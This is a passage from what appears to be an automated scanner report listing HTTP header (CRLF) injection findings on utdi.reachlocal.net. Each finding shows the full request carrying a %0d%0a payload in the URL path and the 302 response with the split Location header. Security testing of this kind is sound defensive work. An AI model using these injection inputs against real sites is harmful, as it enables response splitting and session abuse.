Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:19 GMT
Server: Apache
Location: http://utdi.com/3d3b2
658a9609ca0
/back-front.jpg
Vary: Accept-Encoding
Content-Length: 302
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:11 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/3d3b2
658a9609ca0/back-front.j
...[SNIP]...

1.19. http://utdi.reachlocal.net/images/banr_techcorner.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/banr_techcorner.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9f5da%0d%0a4c3efec7957 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9f5da%0d%0a4c3efec7957/banr_techcorner.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:05 GMT
Server: Apache
Location: http://utdi.com/9f5da
4c3efec7957
/banr_techcorner.jpg
Vary: Accept-Encoding
Content-Length: 307
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:57 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/9f5da
4c3efec7957/banr_techcor
...[SNIP]...

1.20. http://utdi.reachlocal.net/images/box-1.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/box-1.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload e96a7%0d%0a0a5e41817ac was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /e96a7%0d%0a0a5e41817ac/box-1.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:26 GMT
Server: Apache
Location: http://utdi.com/e96a7
0a5e41817ac
/box-1.jpg
Vary: Accept-Encoding
Content-Length: 297
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:19 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/e96a7
0a5e41817ac/box-1.jpg">h
...[SNIP]...

1.21. http://utdi.reachlocal.net/images/box-enews.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/box-enews.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload b64f6%0d%0a348ab3e51c0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /b64f6%0d%0a348ab3e51c0/box-enews.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:23 GMT
Server: Apache
Location: http://utdi.com/b64f6
348ab3e51c0
/box-enews.jpg
Vary: Accept-Encoding
Content-Length: 301
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:16 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/b64f6
348ab3e51c0/box-enews.jp
...[SNIP]...

1.22. http://utdi.reachlocal.net/images/gpx_avaya_ip500sml.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/gpx_avaya_ip500sml.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload fac4e%0d%0ab27292b2e6f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /fac4e%0d%0ab27292b2e6f/gpx_avaya_ip500sml.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:04 GMT
Server: Apache
Location: http://utdi.com/fac4e
b27292b2e6f
/gpx_avaya_ip500sml.jpg
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:57 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/fac4e
b27292b2e6f/gpx_avaya_ip
...[SNIP]...

1.23. http://utdi.reachlocal.net/images/icon_orangecheckball.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/icon_orangecheckball.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3fb1b%0d%0af3643349a48 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3fb1b%0d%0af3643349a48/icon_orangecheckball.gif HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:19 GMT
Server: Apache
Location: http://utdi.com/3fb1b
f3643349a48
/icon_orangecheckball.gif
Vary: Accept-Encoding
Content-Length: 312
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:12 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/3fb1b
f3643349a48/icon_orangec
...[SNIP]...

1.24. http://utdi.reachlocal.net/images/logo-cisco-webex-main.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/logo-cisco-webex-main.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 94032%0d%0afddf97333c8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /94032%0d%0afddf97333c8/logo-cisco-webex-main.gif HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:22 GMT
Server: Apache
Location: http://utdi.com/94032
fddf97333c8
/logo-cisco-webex-main.gif
Vary: Accept-Encoding
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:14 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/94032
fddf97333c8/logo-cisco-w
...[SNIP]...

1.25. http://utdi.reachlocal.net/images/logo_carousel.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/logo_carousel.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5253f%0d%0a9daeaf8bf0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5253f%0d%0a9daeaf8bf0/logo_carousel.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Location: http://utdi.com/5253f
9daeaf8bf0
/logo_carousel.jpg
Vary: Accept-Encoding
Content-Length: 304
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:55 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/5253f
9daeaf8bf0/logo_carousel
...[SNIP]...

1.26. http://utdi.reachlocal.net/images/logo_cisco_footer.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/logo_cisco_footer.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 12683%0d%0a12b8b2e3681 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /images12683%0d%0a12b8b2e3681/logo_cisco_footer.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:19 GMT
Server: Apache
Location: http://utdi.com/images12683
12b8b2e3681
/logo_cisco_footer.jpg
Vary: Accept-Encoding
Content-Length: 315
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:12 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/images12683
12b8b2e3681/logo_c
...[SNIP]...

1.27. http://utdi.reachlocal.net/images/logo_nortel4.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/logo_nortel4.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 71fda%0d%0a954ff42a597 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /71fda%0d%0a954ff42a597/logo_nortel4.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:20 GMT
Server: Apache
Location: http://utdi.com/71fda
954ff42a597
/logo_nortel4.jpg
Vary: Accept-Encoding
Content-Length: 304
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:12 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/71fda
954ff42a597/logo_nortel4
...[SNIP]...

1.28. http://utdi.reachlocal.net/images/mainhead_partners.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/mainhead_partners.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload f3e47%0d%0a28fa46348f5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /f3e47%0d%0a28fa46348f5/mainhead_partners.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:25 GMT
Server: Apache
Location: http://utdi.com/f3e47
28fa46348f5
/mainhead_partners.jpg
Vary: Accept-Encoding
Content-Length: 309
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:17 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/f3e47
28fa46348f5/mainhead_par
...[SNIP]...

1.29. http://utdi.reachlocal.net/images/mainhead_smartbuys.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/mainhead_smartbuys.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7ccfa%0d%0acc135bb4afe was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /images7ccfa%0d%0acc135bb4afe/mainhead_smartbuys.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:03 GMT
Server: Apache
Location: http://utdi.com/images7ccfa
cc135bb4afe
/mainhead_smartbuys.jpg
Vary: Accept-Encoding
Content-Length: 316
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:55 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/images7ccfa
cc135bb4afe/mainhe
...[SNIP]...

1.30. http://utdi.reachlocal.net/images/mainpic_blueguy.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/mainpic_blueguy.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload c530b%0d%0ad59940e884 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /c530b%0d%0ad59940e884/mainpic_blueguy.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:25 GMT
Server: Apache
Location: http://utdi.com/c530b
d59940e884
/mainpic_blueguy.jpg
Vary: Accept-Encoding
Content-Length: 306
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:17 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/c530b
d59940e884/mainpic_blueg
...[SNIP]...

1.31. http://utdi.reachlocal.net/images/mainpic_blueheadline.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/mainpic_blueheadline.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 111fb%0d%0aa1ffc884fd6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /111fb%0d%0aa1ffc884fd6/mainpic_blueheadline.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:25 GMT
Server: Apache
Location: http://utdi.com/111fb
a1ffc884fd6
/mainpic_blueheadline.jpg
Vary: Accept-Encoding
Content-Length: 312
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:17 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/111fb
a1ffc884fd6/mainpic_blue
...[SNIP]...

1.32. http://utdi.reachlocal.net/images/navbutton_about-ovr.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_about-ovr.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ac19a%0d%0a7030fac53e2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ac19a%0d%0a7030fac53e2/navbutton_about-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1

Response

